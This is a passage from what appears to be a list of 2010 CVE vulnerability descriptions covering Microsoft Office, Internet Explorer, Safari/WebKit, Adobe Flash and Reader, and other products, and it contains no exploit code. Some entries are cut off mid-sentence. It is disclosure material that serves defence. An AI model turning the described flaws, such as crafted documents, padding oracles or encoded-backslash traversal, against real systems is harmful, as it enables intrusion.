aka "FlashPix Image Converter Buffer Overflow Vulnerability." [CVE-2010-3950] The TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 does not properly convert data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted TIFF image in an Office document, aka "TIFF Image Converter Memory Corruption Vulnerability." [CVE-2010-3949] Buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3 and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Buffer Overflow Vulnerability." [CVE-2010-3947] Heap-based buffer overflow in the TIFF image converter in the graphics filters in Microsoft Office XP SP3, Office Converter Pack, and Works 9 allows remote attackers to execute arbitrary code via a crafted TIFF image in an Office document, aka "TIFF Image Converter Heap Overflow Vulnerability." [CVE-2010-3946] Integer overflow in the PICT image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted PICT image in an Office document, aka "PICT Image Converter Integer Overflow Vulnerability." [CVE-2010-3945] Buffer overflow in the CGM image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted CGM image in an Office document, aka "CGM Image Converter Buffer Overrun Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability." [CVE-2010-3886] The CTimeoutEventList::InsertIntoTimeoutList function in Microsoft mshtml.dll uses a certain pointer value as part of producing Timer ID values for the setTimeout and setInterval methods in VBScript and JScript, which allows remote attackers to obtain sensitive information about the heap memory addresses used by an application, as demonstrated by the Internet Explorer 8 application. [CVE-2010-3826] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of colors in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3824] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving SVG use elements. [CVE-2010-3823] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving Geolocation objects. NOTE: this might overlap CVE-2010-3415. [CVE-2010-3822] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses an uninitialized pointer during processing of Cascading Style Sheets (CSS) counter styles, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3821] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the :first-letter pseudo-element in a Cascading Style Sheets (CSS) token sequence, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2010-3820] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses uninitialized memory during processing of editable elements, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3819] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) boxes, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3818] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving inline text boxes. [CVE-2010-3817] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) 3D transforms, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3816] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars. [CVE-2010-3813] The WebCore::HTMLLinkElement::process function in WebCore/html/HTMLLinkElement.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3812] Integer overflow in the Text::wholeText method in dom/Text.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3811] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element attributes. [CVE-2010-3810] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the History object, which allows remote attackers to spoof the location bar's URL or add URLs to the history via a cross-origin attack. [CVE-2010-3809] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of inline styling, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3808] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of editing commands, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3805] Integer underflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving WebSockets. NOTE: this may overlap CVE-2010-3254. [CVE-2010-3804] The JavaScript implementation in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, uses a weak algorithm for generating values of random numbers, which makes it easier for remote attackers to track a user by predicting a value, a related issue to CVE-2008-5913 and CVE-2010-3171. [CVE-2010-3803] Integer overflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string. [CVE-2010-3785] Buffer overflow in QuickLook in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document. [CVE-2010-3769] The line-breaking implementation in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 on Windows does not properly handle long strings, which allows remote attackers to execute arbitrary code via a crafted document.write call that triggers a buffer over-read. [CVE-2010-3734] The Install component in IBM DB2 UDB 9.5 before FP6a on Linux, UNIX, and Windows enforces an unintended limit on password length, which makes it easier for attackers to obtain access via a brute-force attack. [CVE-2010-3732] The DRDA Services component in IBM DB2 UDB 9.5 before FP6a allows remote authenticated users to cause a denial of service (database server ABEND) by using the client CLI on Linux, UNIX, or Windows for executing a prepared statement with a large number of parameter markers. [CVE-2010-3658] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3632. [CVE-2010-3657] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656. [CVE-2010-3656] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3657. [CVE-2010-3654] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010. [CVE-2010-3652] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3650. [CVE-2010-3650] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652. [CVE-2010-3649] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3648] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3647] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3646] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3645] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3644] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3643] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3642] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3641] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3640] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3639] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3637] An unspecified ActiveX control in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 (Flash10h.ocx) on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted FLV video. [CVE-2010-3636] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. [CVE-2010-3632] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3658. [CVE-2010-3630] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3629] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3620. [CVE-2010-3628] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3627] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via unknown vectors. [CVE-2010-3626] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-2889. [CVE-2010-3625] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-3622] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3621] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3620] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3629. [CVE-2010-3619] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3535] Unspecified vulnerability in the Directory Server Enterprise Edition component in Oracle Sun Products Suite 6.0, 6.1, 6.2, and 6.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Identity Synchronization for Windows. [CVE-2010-3499] F-Secure Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that "the inability to catch these files are caused by lacking functionality rather than programming errors." [CVE-2010-3498] AVG Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3497] Symantec Norton AntiVirus 2011 does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that this issue "falls into the work of our Firewall and not our AV (per our methodology of layers of defense)." [CVE-2010-3496] McAfee VirusScan Enterprise 8.5i and 8.7i does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3487] Directory traversal vulnerability in YelloSoft Pinky 1.0 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3460] Directory traversal vulnerability in the HTTP interface in AXIGEN Mail Server 7.4.1 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3454] Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write. [CVE-2010-3453] The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write. [CVE-2010-3348] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3342. [CVE-2010-3346] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3345] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3343] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3342] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3348. [CVE-2010-3340] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3337] Untrusted search path vulnerability in Microsoft Office 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Insecure Library Loading Vulnerability." NOTE: this might overlap CVE-2010-3141 and CVE-2010-3142. [CVE-2010-3336] Microsoft Office XP SP3, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "MSO Large SPID Read AV Vulnerability." [CVE-2010-3335] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Drawing Exception Handling Vulnerability." [CVE-2010-3334] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via an Office document containing an Office Art Drawing record with crafted msofbtSp records and unspecified flags, which triggers memory corruption, aka "Office Art Drawing Records Vulnerability." [CVE-2010-3333] Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability." [CVE-2010-3332] Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability." [CVE-2010-3331] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory in certain circumstances involving use of Microsoft Word to read Word documents, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3330] Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2010-3329] mshtmled.dll in Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code via a crafted Microsoft Office document that causes the HtmlDlgHelper class destructor to access uninitialized memory, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3328] Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3327] The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka "Anchor Element Information Disclosure Vulnerability." [CVE-2010-3326] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3325] Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka "CSS Special Character Information Disclosure Vulnerability." [CVE-2010-3268] The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request. [CVE-2010-3242] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Ghost Record Type Parsing Vulnerability." [CVE-2010-3241] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out-of-Bounds Memory Write in Parsing Vulnerability." [CVE-2010-3240] Microsoft Excel 2002 SP3 and 2007 SP2 [CVE-2010-3239] Microsoft Excel 2002 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Extra Out of Boundary Record Parsing Vulnerability." [CVE-2010-3238] Microsoft Excel 2002 SP3 and 2003 SP3, and Office 2004 for Mac, does not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Negative Future Function Vulnerability." [CVE-2010-3237] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Merge Cell Record Pointer Vulnerability." [CVE-2010-3236] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out Of Bounds Array Vulnerability." [CVE-2010-3235] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Biff Record Vulnerability." [CVE-2010-3234] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Substream Memory Corruption Vulnerability." [CVE-2010-3233] Microsoft Excel 2002 SP3 and 2003 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted .wk3 (aka Lotus 1-2-3 workbook) file, aka "Lotus 1-2-3 Workbook Parsing Vulnerability." [CVE-2010-3232] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2010-3231] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Excel Record Parsing Memory Corruption Vulnerability." [CVE-2010-3230] Integer overflow in Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel document with crafted record information, aka "Excel Record Parsing Integer Overflow Vulnerability." [CVE-2010-3228] The JIT compiler in Microsoft .NET Framework 4.0 on 64-bit platforms does not properly perform optimizations, which allows remote attackers to execute arbitrary code via a crafted .NET application that triggers memory corruption, aka ".NET Framework x64 JIT Compiler Vulnerability." [CVE-2010-3221] Microsoft Word 2002 SP3 and 2003 SP3, Office 2004 for Mac, and Word Viewer do not properly handle a malformed record during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3220] Unspecified vulnerability in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3219] Array index vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Parsing Vulnerability." [CVE-2010-3218] Heap-based buffer overflow in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via malformed records in a Word document, aka "Word Heap Overflow Vulnerability." [CVE-2010-3217] Double free 